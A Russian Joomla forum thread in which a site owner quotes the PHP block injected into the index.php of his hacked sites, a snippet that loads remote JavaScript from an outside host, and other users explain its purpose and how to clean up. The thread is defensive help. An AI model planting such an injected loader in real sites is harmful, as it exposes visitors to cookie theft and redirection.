Форум русской поддержки Joomla!® CMS
08.12.2016, 02:19:59 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1]   Вниз
  Добавить закладку  |  Печать  
Автор

Взломана Joomla, непонятный скрипт

 (Прочитано 454 раз)
0 Пользователей и 1 Гость смотрят эту тему.
ap11
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 17


Разработка сайтов на Joomla!


« : 21.06.2015, 01:01:22 »

Есть несколько сайтов на одном хостинге: один из них на Joomla 1.5, другие на Joomla 2.5.4
Произошел взлом какого-то сайта, наверное 1.5, в результате заражены были все сайты.
В файле index.php всех сайтов стоит блок:

Код:
<?php
#033761#
if(empty($j)) {
$j = "<script type=\"text/javascript\" src=\"http://ghseif.us/manage/login/6fh1tz6y.php?id=12745\"></script>";
echo $j;
}
#/033761#
?>


если смотреть код сайта в HTML то там просто стоит скрипт в коде:

Код:
<script type="text/javascript" src="http://ghseif.us/manage/login/6fh1tz6y.php?id=12745"></script>

Вопрос: в чем смысл этой ссылки в скрипте? она ведь не индексируется поисковиком... или может быть редирект при каких-то условиях..?

И решится проблема, если просто обновить сайты и убрать этот код из index.php?

И еще не совсем понятно ситуация: в корне сайта есть папки с датой изменения как и файла index.php, но в папках нет файлов этой даты, все файлы старые.. это тоже могло быть изменено при взломе?
« Последнее редактирование: 21.06.2015, 01:08:17 от ap11 » Записан
zomby6888
Живу я здесь
******

Репутация: +168/-3
Offline Offline

Пол: Мужской
Сообщений: 1538


« Ответ #1 : 21.06.2015, 01:19:23 »

Цитировать
Вопрос: в чем смысл этой ссылки в скрипте?

В том что произвольный код исполняется на страницах сайта. Он может что угодно делать, воровать пользовательские кукисы и данные,  или перенаправлять пользователей например.
Записан
ChaosHead
Профи
********

Репутация: +381/-10
Offline Offline

Пол: Мужской
Сообщений: 4396



« Ответ #2 : 21.06.2015, 01:22:13 »

Проблема решается откатом сайтов из резервной копии и дальнейшим обновлением или поиском уязвимостей.
Записан
draff
Практически профи
*******

Репутация: +161/-5
Offline Offline

Пол: Мужской
Сообщений: 2657


step by step


« Ответ #3 : 21.06.2015, 06:24:37 »

Если Joomla до 1.5.26, и до 2.5.28, то все содержат уязвимость.
Сканер айболит в помощь
Записан
wishlight
Профи
********

Репутация: +200/-1
Offline Offline

Пол: Мужской
Сообщений: 3488


skype aqaus.com


« Ответ #4 : 21.06.2015, 07:53:26 »

Кроме этого каждый сайт надо отделить от другого.
Записан
ap11
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 17


Разработка сайтов на Joomla!


« Ответ #5 : 21.06.2015, 17:08:12 »

спасибо всем за ответы
я так понимаю взлом может быть из-за расширений также
на Joomla 2.5.4 стоят:

компоненты:
Ackeeba Backup
Fox Contact (для Joomla 1.7)
Rockcandy
RokGallery
EasyBook

плагин:
AllVideos

шаблон от Рокетов с Gantry фреймворком. также привлекло внимание, что не во всех php файлах шаблона стоит defined('_JEXEC') or die('Restricted access');  т.е. запрет прямого доступа к файлам

Что из этого опасно?
Мне кажется Fox Contact, т.к. Joomla 1.7, и возможно Ackeeba Backup, т.к. можно выкачать сайт... ну и прямого доступа также не должно быть..
Записан
ChaosHead
Профи
********

Репутация: +381/-10
Offline Offline

Пол: Мужской
Сообщений: 4396



« Ответ #6 : 21.06.2015, 20:57:10 »

Взлом ещё может быть от того, что вирус в вашем компьютере украл пароль от ftp
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 726


Свободен для работы


« Ответ #7 : 22.06.2015, 08:26:40 »

спасибо всем за ответы
я так понимаю взлом может быть из-за расширений также
на Joomla 2.5.4 стоят:

компоненты:
Ackeeba Backup
Fox Contact (для Joomla 1.7)
Rockcandy
RokGallery
EasyBook

плагин:
AllVideos

шаблон от Рокетов с Gantry фреймворком. также привлекло внимание, что не во всех php файлах шаблона стоит defined('_JEXEC') or die('Restricted access');  т.е. запрет прямого доступа к файлам

Что из этого опасно?
Мне кажется Fox Contact, т.к. Joomla 1.7, и возможно Ackeeba Backup, т.к. можно выкачать сайт... ну и прямого доступа также не должно быть..
Конкретно встречался с уязвимостями на Ackeeba Backup, Fox Contact, RokGallery, здается мне если в сторону других капнуть, там тоже всплывет что нить...
Записан
Страниц: [1]   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet